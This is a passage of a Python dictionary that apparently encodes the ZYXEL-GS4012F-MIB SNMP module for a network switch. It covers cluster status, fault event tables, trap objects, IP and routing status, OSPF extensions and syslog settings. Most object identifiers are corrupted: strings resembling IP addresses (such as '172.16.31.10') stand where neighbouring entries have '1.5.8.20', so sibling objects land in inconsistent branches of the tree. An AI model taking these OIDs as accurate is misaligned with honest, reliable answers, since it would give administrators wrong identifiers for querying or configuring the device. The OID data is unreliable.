"clusterCandidateName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.35.3.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"clusterCandidateModel" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.3.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"clusterStatus" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.4",
}, # node
"clusterStatusRole" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.4.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"none" : {
"nodetype" : "namednumber",
"number" : "0"
},
"manager" : {
"nodetype" : "namednumber",
"number" : "1"
},
"member" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"clusterStatusManager" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.4.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"clsuterStatusMaxNumOfMember" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.4.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"clusterStatusMemberTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.4.4",
"status" : "current",
"description" :
"""""",
}, # table
"clusterStatusMemberEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.4.4.1",
"status" : "current",
"linkage" : [
"clusterStatusMemberMac",
],
"description" :
"""An entry in clusterStatusMemberTable.""",
}, # row
"clusterStatusMemberMac" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.4.4.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"clusterStatusMemberName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.35.4.4.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"clusterStatusMemberModel" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.4.4.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"clusterStatusMemberStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.35.4.4.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"error" : {
"nodetype" : "namednumber",
"number" : "0"
},
"online" : {
"nodetype" : "namednumber",
"number" : "1"
},
"offline" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"faultMIB" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.36",
"status" : "current",
}, # node
"eventObjects" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.36.1",
}, # node
"eventTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.36.1.1",
"status" : "current",
"description" :
"""A list of currently active fault events. All faults
of normal type regardless of their severity level
are recorded in the event table. When a normal
type fault is cleared it is deleted from the event
table.""",
}, # table
"eventEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.36.1.1.1",
"status" : "current",
"linkage" : [
"eventSeqNum",
],
"description" :
"""An entry containing information about an
event in the event table.""",
}, # row
"eventSeqNum" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.36.1.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""This variable represents the sequence number of an event.
Sequence number is incremented monotonically starting
from 0 until it reaches its maximum and wraps around back
to 0.
Sequence number is incremented when
- the state of a normal type fault is set on (the same sequence
number is present in the events table as well as in the trap
that is sent to notify about the fault on event)
- delta event occurs (sequence number present in trap message)
- the state of a normal type fault is set off (sequence number
present in trap that is sent to notify for clearing).""",
}, # column
"eventEventId" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.36.1.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"ZYXEL-GS4012F-MIB", "name" : "EventIdNumber"},
},
"access" : "readonly",
"description" :
"""This variable represents the event ID which uniquely
identifies the event in the entire system.""",
}, # column
"eventName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.36.1.1.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "OctetString",
"parent module" : {
"name" : "RFC1213-MIB",
"type" : "DisplayString",
},
"ranges" : [
{
"min" : "0",
"max" : "40"
},
],
"range" : {
"min" : "0",
"max" : "40"
},
},
},
"access" : "readonly",
"description" :
"""This variable represents the name of the event, for
example 'Ethernet Link Down'""",
}, # column
"eventInstanceType" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.36.1.1.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"ZYXEL-GS4012F-MIB", "name" : "InstanceType"},
},
"access" : "readonly",
"description" :
"""This variable represents the type of InstanceId of a
particular event in the event table. In brief
the instanceType refers to the type of sub-component
generating this event in the system, for example
switch (5). For more details see the textual
conventions section.
AFFECTS: eventInstanceId,
eventInstanceName""",
}, # column
"eventInstanceId" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.36.1.1.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""This variable represents the InstanceId of a particular
event in the event current table. In brief the instanceId
refers to the sub-component generating this event in the
system, for example '1' for port 1. For more details see
the textual conventions section.
DEPENDS ON: eventInstanceType""",
}, # column
"eventInstanceName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.36.1.1.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""This variable is mainly used to store additional information
about the sub-component that is generating an event. For
example this field may specify what cooling fan is faulty.
DEPENDS ON: eventInstanceType""",
}, # column
"eventSeverity" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.36.1.1.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"ZYXEL-GS4012F-MIB", "name" : "EventSeverity"},
},
"access" : "readonly",
"description" :
"""This variable dictates the urgency of action when a event
occurs. There are four severity levels - Critical, Major,
Minor, and Informational. Critical events are those, which
require immediate operator intervention to prevent/reduce
system down time. Major events require quick attention and
Minor events possibly require some attention. Informational
events indicate the occurrence of events that may need to be
investigated.""",
}, # column
"eventSetTime" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.36.1.1.1.8",
"status" : "current",
"syntax" : {
"type" : { "module" :"ZYXEL-GS4012F-MIB", "name" : "UtcTimeStamp"},
},
"access" : "readonly",
"description" :
"""This table contains only normal events and this variable
represents the time when the event become active, i.e. the
number of seconds since Jan 1, 1970 12:00AM.""",
}, # column
"eventDescription" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.36.1.1.1.9",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "OctetString",
"parent module" : {
"name" : "RFC1213-MIB",
"type" : "DisplayString",
},
"ranges" : [
{
"min" : "0",
"max" : "255"
},
],
"range" : {
"min" : "0",
"max" : "255"
},
},
},
"access" : "readonly",
"description" :
"""This variable contains a description of the event and reasons
behind the event. This is a free format alpha-numeric string
that is set by the entity generating this event. This variable
may be empty if there is no usefull information to report.
The maximum length of this string is 255 characters.""",
}, # column
"eventServAffective" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.36.1.1.1.10",
"status" : "current",
"syntax" : {
"type" : { "module" :"ZYXEL-GS4012F-MIB", "name" : "EventServiceAffective"},
},
"access" : "readonly",
"description" :
"""This variable indicates whether the event is service affective or not""",
}, # column
"faultTrapsMIB" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.37",
"status" : "current",
}, # node
"trapInfoObjects" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.37.1",
}, # node
"trapRefSeqNum" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.37.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Indicates the former sequence number of a cleared event
in the event table. Not intended to read but only used in
trap notifications.""",
}, # scalar
"trapPersistence" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.37.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"ZYXEL-GS4012F-MIB", "name" : "EventPersistence"},
},
"access" : "readonly",
"description" :
"""Indicates whether the event is delta (automatically and
immediately cleared) or normal (not automatically cleared).
Not intended to read but only used in trap notifications.""",
}, # scalar
"trapSenderNodeId" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.37.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Represents the node ID of the sending network element. If not
supported should be set to 0. Not intended to read but only
used in trap notifications.""",
}, # scalar
"trapNotifications" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.37.2",
}, # node
"ipStatus" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.38",
}, # node
"ipStatusTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.38.1",
"status" : "current",
"description" :
"""""",
}, # table
"ipStatusEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.38.1.1",
"status" : "current",
"linkage" : [
"ipStatusIPAddress",
"ipStatusVid",
],
"description" :
"""""",
}, # row
"ipStatusIPAddress" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.38.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ipStatusVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.38.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ipStatusPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.38.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ipStatusType" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.38.1.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"static" : {
"nodetype" : "namednumber",
"number" : "1"
},
"dynamic" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routingStatus" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.192.168.127.120.39",
}, # node
"routingStatusTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.39.1",
"status" : "current",
"description" :
"""""",
}, # table
"routingStatusEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.39.1.1",
"status" : "current",
"linkage" : [
"routingStatusDestAddress",
],
"description" :
"""""",
}, # row
"routingStatusDestAddress" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.39.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routingStatusDestMaskbits" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.39.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routingStatusGateway" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.39.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routingStatusInterface" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.39.1.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routingStatusMetric" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.39.1.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routingStatusType" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.39.1.1.6",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"rip" : {
"nodetype" : "namednumber",
"number" : "1"
},
"bgp" : {
"nodetype" : "namednumber",
"number" : "2"
},
"ospf" : {
"nodetype" : "namednumber",
"number" : "3"
},
"static" : {
"nodetype" : "namednumber",
"number" : "4"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfExt" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40",
}, # node
"ospfInterfaceTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.1",
"status" : "current",
"description" :
"""""",
}, # table
"ospfInterfaceEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.1.1",
"status" : "current",
"linkage" : [
"ospfIfIpAddress",
"ospfAddressLessIf",
],
"description" :
"""""",
}, # row
"ospfIfKeyId" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"ospfIfMaskbits" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.40.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfIfDesignatedRouterID" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.40.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfIfBackupDesignatedRouterID" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.172.16.31.10.1.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfIfNbrCount" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.1.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfIfAdjacentNbrCount" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.1.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfIfHelloDueTime" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.1.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfAreaExtTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.40.2",
"status" : "current",
"description" :
"""""",
}, # table
"ospfAreaExtEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.40.2.1",
"status" : "current",
"linkage" : [
"ospfAreaId",
],
"description" :
"""""",
}, # row
"ospfAreaExtName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.40.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"ospfRedistributeRouteTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.3",
"status" : "current",
"description" :
"""""",
}, # table
"ospfRedistributeRouteEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.3.1",
"status" : "current",
"linkage" : [
"ospfRedistributeRouteProtocol",
],
"description" :
"""""",
}, # row
"ospfRedistributeRouteProtocol" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.3.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"rip" : {
"nodetype" : "namednumber",
"number" : "1"
},
"static" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfRedistributeRouteState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.3.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"ospfRedistributeRouteType" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.3.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"ospfRedistributeRouteMetric" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.3.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"ospfNbrExtTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.4",
"status" : "current",
"description" :
"""""",
}, # table
"ospfNbrExtEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.4.1",
"status" : "current",
"linkage" : [
"ospfNbrIpAddr",
"ospfNbrAddressLessIndex",
],
"description" :
"""""",
}, # row
"ospfNbrExtRole" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.4.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"dr" : {
"nodetype" : "namednumber",
"number" : "1"
},
"backup" : {
"nodetype" : "namednumber",
"number" : "2"
},
"dr_other" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfNbrExtDeadtime" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.4.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfNbrExtInterface" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.4.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfNbrExtRXmtL" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.4.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfNbrExtRqstL" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.4.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfNbrExtDBsmL" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.4.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfLsdbExtTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.5",
"status" : "current",
"description" :
"""""",
}, # table
"ospfLsdbExtEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.5.1",
"status" : "current",
"linkage" : [
"ospfLsdbAreaId",
"ospfLsdbType",
"ospfLsdbLSID",
"ospfLsdbRouterId",
],
"description" :
"""""",
}, # row
"ospfLsdbExtLinkCount" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.40.5.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfLsdbExtRouteAddress" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.5.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfLsdbExtRouteMaskbits" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.5.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfVirtualLinkTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.6",
"status" : "current",
"description" :
"""""",
}, # table
"ospfVirtualLinkEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.40.6.1",
"status" : "current",
"linkage" : [
"ospfVirtIfAreaID",
"ospfVirtIfNeighbor",
],
"description" :
"""""",
}, # row
"ospfVirtualLinkName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.6.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"ospfVirtualLinkKeyId" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.6.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"sysLogSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.41",
}, # node
"sysLogState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.41.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""sysLog enabled/disabled for the switch.""",
}, # scalar
"sysLogTypeTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.41.2",
"status" : "current",
"description" :
"""""",
}, # table
"sysLogTypeEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.41.2.1",
"status" : "current",
"linkage" : [
"sysLogTypeIndex",
],
"description" :
"""An entry in sysLogTypeTable.""",
}, # row
"sysLogTypeIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.41.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "noaccess",
"description" :
"""""",
}, # column
"sysLogTypeName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.41.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"sysLogTypeState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.41.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"sysLogTypeFacility" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.41.2.1.4",
"status" : "current",
"syntax" : {
